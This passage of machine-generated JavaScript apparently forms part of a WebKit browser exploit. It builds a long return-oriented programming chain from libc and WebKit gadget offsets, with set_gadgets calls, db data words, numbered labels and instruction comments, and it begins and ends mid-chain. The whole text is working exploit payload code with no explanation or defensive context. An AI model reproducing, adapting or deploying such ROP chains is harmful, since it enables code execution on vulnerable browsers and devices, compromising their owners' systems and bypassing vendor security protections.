libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+202168, //L3379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3379:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3381:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+202288, //L3384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+202272, //L3382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3382:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3384:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+202432, //L3387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+202400, //L3385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+202416, //L3386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3385:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3386:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3387:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+202512, //L3388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3388:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3390:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+202632, //L3393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+202616, //L3391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3391:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3393:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+202776, //L3396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+202744, //L3394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+202760, //L3395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3394:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3395:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3396:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+202848, //L3398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3398:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+202904, //L3399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3399:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+202984, //L3401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3401:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3403:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+203104, //L3406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+203088, //L3404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3404:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3406:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+203264, //L3410
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+203216, //L3407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+203232, //L3408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3407:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3408:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3409:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L3410:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+203320, //L3411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3411:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3413:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+853989, //mov rax, rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+203448, //L3415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3415:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+203504, //L3416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3416:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+203648, //L3419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+203664, //L3420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+203632, //L3418
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3418:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3419:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3420:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+203824, //L3424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+203792, //L3422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+203808, //L3423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3421:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3422:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3423:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3424:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+203880, //L3426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3426:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+204008, //L3428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+204024, //L3429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+203992, //L3427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3427:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3428:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3429:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+204184, //L3433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+204152, //L3431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204168, //L3432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3430:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3431:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3432:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3433:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+204240, //L3435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3435:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+204368, //L3437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+204384, //L3438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204352, //L3436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3436:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3437:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3438:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+204544, //L3442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+204512, //L3440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204528, //L3441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3439:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3440:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3441:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3442:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+204600, //L3444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3444:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+204728, //L3446
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+204744, //L3447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204712, //L3445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3445:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3446:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3447:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+204824, //L3448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+204840, //L3449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3448:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3449:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+204936, //L3451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+204920, //L3450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3450:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3451:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+205016, //L3452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3452:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3454:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+205136, //L3457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+205120, //L3455
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3455:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3457:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+205216, //L3459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+205248, //L3461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3459:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L3460:
ropchain+205376, //L3458
libc_base+144605 //pop rdi
]);
//L3461:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+205352, //L3463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+205368, //L3462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3463:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3462:
db([0, 0]); // 0x0
//L3458:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+205440, //L3464
//L3347:
libc_base+782311, //pop rsp
ropchain+205456, //L3465
//L3464:
libc_base+782311, //pop rsp
ropchain+200688, //L3340
//L3465:
libc_base+764760, //pop rsi
ropchain+205496, //L3466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3466:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3468:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+205616, //L3471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+205600, //L3469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3469:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3471:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+205792, //L3474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+205808, //L3475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+205760, //L3472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+205776, //L3473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3472:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3473:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3474:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3475:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+205904, //L3477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+205888, //L3476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3476:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3477:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3478:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3479:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L3480:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+206104, //L3482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3482:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+206160, //L3483
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3483:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+206296, //L3487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+206280, //L3486
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3485:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3486:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3487:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+206432, //L3490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+206464, //L3492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+206416, //L3489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3489:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3490:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3491:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3492:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+206576, //L3493+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+206568, //L3493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3493:
db([0, 0]); // 0x0
set_gadgets([
ropchain+206592, //L3493+24
ropchain+210392, //L3488
//L3494:
libc_base+764760, //pop rsi
ropchain+206632, //L3495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3495:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3497:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+206752, //L3500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+206736, //L3498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3498:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3500:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+206896, //L3503
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+206864, //L3501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+206880, //L3502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3501:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3502:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3503:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+206976, //L3504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3504:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3506:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+207096, //L3509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+207080, //L3507
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3507:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3509:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+207208, //L3510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+207240, //L3512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+207224, //L3511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3510:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3511:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3512:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+207360, //L3513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3513:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3515:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+207480, //L3518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+207464, //L3516
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3516:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3518:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+207656, //L3521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+207672, //L3522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+207624, //L3519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+207640, //L3520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3519:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3520:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3521:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3522:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+207832, //L3526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+207800, //L3524
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+207816, //L3525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3523:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3524:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3525:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3526:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+207920, //L3527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+207936, //L3528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3527:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3528:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+208112, //L3530
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+208128, //L3531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+208096, //L3529
